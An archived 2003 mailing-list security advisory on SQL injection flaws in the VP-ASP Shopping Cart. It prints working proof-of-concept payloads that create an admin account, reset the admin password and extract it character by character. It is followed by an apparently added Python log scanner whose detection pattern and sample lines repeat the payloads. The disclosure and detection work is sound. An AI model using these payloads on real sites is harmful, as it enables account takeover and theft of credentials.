Full Disclosure mailing list archives
Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities
From: S-Quadra Security Research <research () s-quadra com>
Date: Mon, 01 Dec 2003 16:15:53 +0300
S-Quadra Advisory #2003-11-28

Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities
Severity: Average
Vendor URL: http://www.vpasp.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt
Release date: 28 Nov 2003

1. DESCRIPTION

Virtual Programming VP-ASP is a shopping cart application for e-commerce enabled sites. It is written in ASP, supports the following databases: Access, MSSQL, MYSQL on Windows and MYSQL on Unix.

VP-ASP suffers from SQL injection vulnerabilities, which may allow an attacker in some cases to gain administrative access to the installed VP-ASP Shopping Cart software or execute arbitrary commands on a target's system.

2. DETAILS

-- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script

An SQL Injection vulnerability has been found in the shopsearch.asp script. User supplied input is not filtered before being used in a SQL query. Consequently, query modification using malformed input is possible.

Exploitation of the vulnerability allows a remote attacker to insert a new user with administrative privileges. A more sophisticated exploitation would allow a remote attacker to execute arbitrary commands on a target's system (via MSSQL xp_cmdshell() function for example).

-- PoC code 1:

Platform: Win32/MSSQL

Posting this data to shopsearch.asp creates new administrative account:

Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

Posting this data to shopsearch.asp changes admin password:

Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

-- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script

An SQL Injection vulnerability has been found in the shopdisplayproducts.asp script. Exploitation of the vulnerability will allow a remote attacker to read any information from a database.

-- PoC code 2:

Platform: Win32/MSSQL

http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

By changing the value at the end of the request:

%20'a%25'--
%20'b%25'--
%20'c%25'--
...

and looking through the HTTP response from the VP-ASP web server, an attacker can find the admin password.

3. FIX INFORMATION

S-Quadra alerted VP-ASP development team to this issue on 28th November 2003.

Security fixes from VP-ASP development team are available at http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

4. CREDITS

Nick Gudov <cipher () s-quadra com> is responsible for discovering this issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and network assessment, web application security, source code review and third party product vulnerability assessment, forensic support and reverse engineering.

Security is an art and our goal is to bring responsible and high quality security service to the IT market, customized to meet the unique needs of each individual client.

S-Quadra, (pronounced es quadra), is not an acronym. It's unique, creative and innovative - just like the security services we bring to our clients.

S-Quadra Advisory #2003-11-28

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
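
For sites still running an unpatched VP-ASP, the character-by-character probing in PoC 2 above leaves a recognisable trail in the web server's access log. The following log check is an added example, not part of the S-Quadra advisory or of VP-ASP; the 7-field log layout, the sample lines and the heuristic pattern are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Script -> query parameter to inspect (names taken from the advisory).
WATCHED = {"shopdisplayproducts.asp": "cat"}
# Heuristic markers: quote, SQL comment, statement separator, UNION SELECT,
# or the tbluser table. A category containing an apostrophe would also match.
SUSPICIOUS = re.compile(r"'|--|;|\bunion\b.+\bselect\b|\btbluser\b", re.I)

# Constructed sample log; the 7-field layout is an assumption:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2003-12-01 10:00:01 192.0.2.10 GET /vpasp/shopdisplayproducts.asp cat=Books 200
2003-12-01 10:00:05 198.51.100.7 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-- 200
2003-12-01 10:00:06 198.51.100.7 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'b%25'-- 200
2003-12-01 10:00:09 192.0.2.10 GET /vpasp/shopdisplayproducts.asp cat=Kids%20Toys 200
2003-12-01 10:00:12 203.0.113.4 GET /vpasp/default.asp - 200
"""


def scan(log_text):
    """Return (hits, per_ip): flagged (ip, decoded value) pairs and hits per client."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue  # skip W3C header lines and malformed entries
        _date, _time, ip, _method, stem, query, _status = parts
        param = WATCHED.get(stem.rsplit("/", 1)[-1].lower())
        if param is None or query == "-":
            continue
        # parse_qs percent-decodes, so %20 and %25 become ' ' and '%'.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if SUSPICIOUS.search(value):
                hits.append((ip, value))
    # Many hits from one client is the signature of the LIKE 'a%', 'b%', ... probing.
    return hits, Counter(ip for ip, _ in hits)


if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE_LOG)
    for ip, count in per_ip.most_common():
        print(f"{ip}: {count} suspicious request(s)")
```

The shopsearch.asp requests in PoC 1 are POSTs, so their parameters do not appear in a query-string log and need request-body logging to be checked the same way.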